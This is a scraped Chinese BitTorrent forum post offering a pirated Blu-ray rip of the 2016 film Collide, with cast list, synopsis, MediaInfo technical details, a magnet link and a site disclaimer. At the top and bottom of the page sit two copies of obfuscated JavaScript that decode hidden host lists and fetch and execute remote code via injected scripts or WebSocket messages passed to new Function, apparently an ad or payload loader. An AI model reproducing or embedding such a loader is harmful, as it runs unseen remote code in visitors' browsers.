极速之巅[中文字幕].Collide.2016.1080p.BluRay.x265.10bit.DTS 6.90GB

版主小s 14天前 199

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 极速之巅 / 偷天劫车手(台) / Collide

◎片 名 Autobahn

◎年 代 2016

◎产 地 英国 / 德国 / 中国大陆 / 美国

◎类 别 动作 / 惊悚

◎语 言 英语 / 德语

◎上映日期 2016-12-02(中国大陆) / 2017-02-24(中国台湾) / 2016-07-28(德国)

◎IMDb链接 https://www.imdb.com/title/tt2126235/

◎豆瓣评分 5.2/10 (5614人评价)

◎豆瓣链接 https://movie.douban.com/subject/25708452/

◎片 长 99分钟

◎导 演 伊兰·克里维 Eran Creevy (id:1310081)

◎编 剧 F·斯科特·弗雷泽 F. Scott Frazier (id:1329306)

伊兰·克里维 Eran Creevy (id:1310081)

◎演 员 尼古拉斯·霍尔特 Nicholas Hoult (id:1036341)

菲丽希缇·琼斯 Felicity Jones (id:1013981)

安东尼·霍普金斯 Anthony Hopkins (id:1054434)

本·金斯利 Ben Kingsley (id:1054393)

马尔万·肯扎里 Marwan Kenzari (id:1273062)

亚历山大·约瓦诺维奇 Aleksandar Jovanovic (id:1113359)

克里斯蒂安·鲁贝克 Christian Rubeck (id:1341113)

厄达尔·伊迪兹 Erdal Yildiz (id:1383156)

克雷蒙斯·施伊克 Clemens Schick (id:1320236)

Johnny Palmiero Johnny Palmiero (id:1336116)

本·哈克 Ben Hecker (id:1098795)

约阿希姆·克罗尔 Joachim Król (id:1019265)

Markus Klauk Markus Klauk (id:1341114)

米迦勒·埃普 Michael Epp (id:1052118)

纳迪娅·希尔克 Nadia Hilker (id:1355969)

Martin Hentschel (id:1263859)

斯文娅克莱菲尔德 Svenja Kleinfeld (id:1350725)

Annina Nusko Annina Nusko (id:1350724)

切宁韦斯特 Cherin West (id:1344303)

Alexander Wolf (id:1263988)

琳赛·伊丽莎白 Lindsey Elizabeth (id:1341111)

丹·密茨 Dan Mintz (id:1417958)

切宁韦斯特 Cherin West (id:1344303)

◎标 签 动作 / 犯罪 / 公路 / 2016 / 激情 / 德国 / 英国 / 美国

◎简 介

美国小贼凯西(尼古拉斯·霍尔特 Nicholas Hoult 饰)在国内犯下不计其数的案件。为了活命,他逃到了德国,成为当地大毒枭格兰(本·金斯利 Ben Kingsley 饰)手下的毒贩,平静的生活下包裹着刀尖上舔血的惊险生活。正在此时,他的爱人朱丽叶特(菲丽希缇·琼斯 Felicity Jones 饰)被发现有严重的肾病且急需要做移植手术。平静的伪装被打破。为了支付女友昂贵的医疗费,凯西决定以生命为赌注做一单大的,却又恰巧将自己卷入以一个牵涉德国最大毒枭哈根(安东尼·霍普金斯 Anthony Hopkins 饰)的惊天复仇阴谋,此刻不仅仅是他自己,他女友的性命也成了整个阴谋中至关重要的一环。在德国无限速公路上凯西和杀人不眨眼的毒枭组织们展开了激烈的追逐……

◎获奖情况 (共1项)

第38届金酸莓奖 (2018)

最差男配角(提名)

└──安东尼·霍普金斯 (id:1054434)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 46946706113506155214420833379301390182 (0x23519B514F3CFD9BF326D3216D5AF766)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.90 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate : 10.0 Mb/s

  10. Movie name : Collide 2016

  11. Encoded date : UTC 2021-10-10 07:09:50

  12. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 38 min

  23. Bit rate : 8 456 kb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.230

  33. Stream size : 5.83 GiB (85%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=16.8000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 38 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 16 bits

  52. Compression mode : Lossy

  53. Stream size : 1.04 GiB (15%)

  54. Language : English

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4611 (0x1203)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 29 min

  66. Bit rate : 29.9 kb/s

  67. Count of elements : 1405

  68. Stream size : 19.0 MiB (0%)

  69. Title : chs&eng

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4610 (0x1202)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 29 min

  82. Bit rate : 13.3 kb/s

  83. Count of elements : 1405

  84. Stream size : 8.48 MiB (0%)

  85. Title : chs

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4613 (0x1205)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 29 min

  98. Bit rate : 29.6 kb/s

  99. Count of elements : 1405

  100. Stream size : 18.8 MiB (0%)

  101. Title : cht&eng

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4612 (0x1204)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 29 min

  114. Bit rate : 13.7 kb/s

  115. Count of elements : 1405

  116. Stream size : 8.72 MiB (0%)

  117. Title : cht

  118. Language : Chinese

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Menu

  123. 00:00:00.000 : Chapter 01

  124. 00:10:29.712 : Chapter 02

  125. 00:19:13.944 : Chapter 03

  126. 00:26:06.565 : Chapter 04

  127. 00:35:39.053 : Chapter 05

  128. 00:46:35.709 : Chapter 06

  129. 00:58:15.200 : Chapter 07

  130. 01:10:06.577 : Chapter 08

  131. 01:18:05.847 : Chapter 09

  132. 01:28:32.765 : Chapter 10


TAGS 动作 惊悚

磁力链:
  • magnet:?xt=urn:btih:A70F12EE59BC703B00910CB5DA8288AE43F87998

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};